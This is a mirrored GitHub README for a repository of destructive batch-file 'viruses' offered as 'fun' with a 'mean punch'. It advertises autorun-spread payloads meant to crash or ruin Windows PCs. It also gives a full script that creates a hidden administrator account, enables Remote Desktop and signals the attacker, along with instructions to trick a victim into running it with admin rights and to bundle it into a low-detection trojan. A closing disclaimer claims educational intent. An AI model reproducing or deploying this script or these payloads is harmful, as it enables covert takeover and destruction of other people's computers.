Giter VIP home page Giter VIP logo

palahsu / malware-smog Goto Github PK

View Code? Open in Web Editor NEW
33.0 1.0 14.0 168 KB

There are many powerful viruses 💀 that can damage your PC in a matter of seconds. Batch file virus to gain full access to another computer. This repo is a collection of fun little viruses that pack a mean punch!

Home Page: https://t.me/cyberclans

License: GNU General Public License v3.0

Batchfile 100.00%
batch-script batch-file virus batchfile batchfiles viruses virustotal malware malware-research malware-analysis

malware-smog's Introduction

MalwareSmog

In this file, There are many powerful viruses 💀 that can damage your PC in a matter of seconds. This repo is a collection of fun little viruses that pack a mean punch! If you know anything about hacking, you will know that batch files are usually a stigma of the hacking world, most of the tutorials will show you how to create a "virus" that is nothing but empty and the creator can achieve nothing but laughter, which is okay, but those camouflage won't be helpful if you want to do some real permanent damage.

Features

  • Shutdowns
  • Crashespc
  • Disablenet
  • System Meltdown
  • Blue Screen Fake
  • Kill USB
  • Pc Optimize
  • More Malware

Please, Note that the above mentioned viruses make use of the autorun.inf file to exploit the autorun feature and can easily infect a windows machine and their effect can be devistating. And There are two PC Optimizer Trojan! Each .bat file can potencially destroy a PC if it's run individually. I have set them all to autorun, ensuring a non recoverable end result.

For an additional virus that is unlinked and unaffiliated with the .bat set please see the file named!
Complete_viruscode_Pascal.

Let's try to make an actual batch file virus to gain full access to another computer. NOTE: The user is going to have to be tricked into opening a file that requires admin access.

The first step is to open notepad and type in:

@echo offnet user winsystem winsystem /addnet localgroup administrators winsystem /add powershell set-executionpolicy 

unrestrictedpowershell $path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' 

powershell New-Item $path -Force | New-ItemProperty -Name winsystem -Value 0 -PropertyType DWord -Force reg add 

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

msg <insert your IP here> Its ready.

How it Works

  • The first line creates a new user called winsystem with the password winsystem.
  • The second line adds the new user as an admin.
  • The third line allows PowerShell scripts to run.
  • The fourth and fifth lines hide the user from the Log in screen.
  • The sixth line allows RDP (Remote Desktop Protocol).
  • The seventh line sends the IP address that is imputed the message "Its ready."

REMEMBER: When the box opens DO NOT CLOSE IT! Copy down the computer name, open cmd, and type: ping .

Thats all! As soon as you get the IP, Copy it and input it into RDP and log in as winsystem.

NOTE: Replace the items in < > as the items specified (duh). This may be detected by antivirus, but if you join the regular .bat file with a different file a Trojan can be made with low detection rates.

⚠️Note

Remember, that all responsibilities are at your own risk. Please use it only for research purposes. Do not share & store this on Your PC! Some file Modified by Unknown! Some file is not tested.

For any kind of help, support, payment, donate, suggestion and request ask me on Gmail / Telegram:

Follow

Disclaimer: Please note that this is a research project. I am by no means responsible for any usage of this tool. Use it on your behalf. I am not responsible if your accounts are banned due to extensive use of this tool. I am not responsible for any damages, this scripts and tools only for testing purpose. Everything here in this repository has been made for educational purposes, and/or ran in a controlled testing environment only. I do NOT enourage people to do something like this themselves/to themselves. NEVER use malware, or anything that is, but no limited to, malware, anything remotely capable of destroying computers, or even "joke programs" on your own or other people's computers, not even with their consent, as this can have bad, unforeseen consequences. Be careful not to infect yourself when accessing and experimenting with malicious software!

malware-smog's People

Contributors

palahsu avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.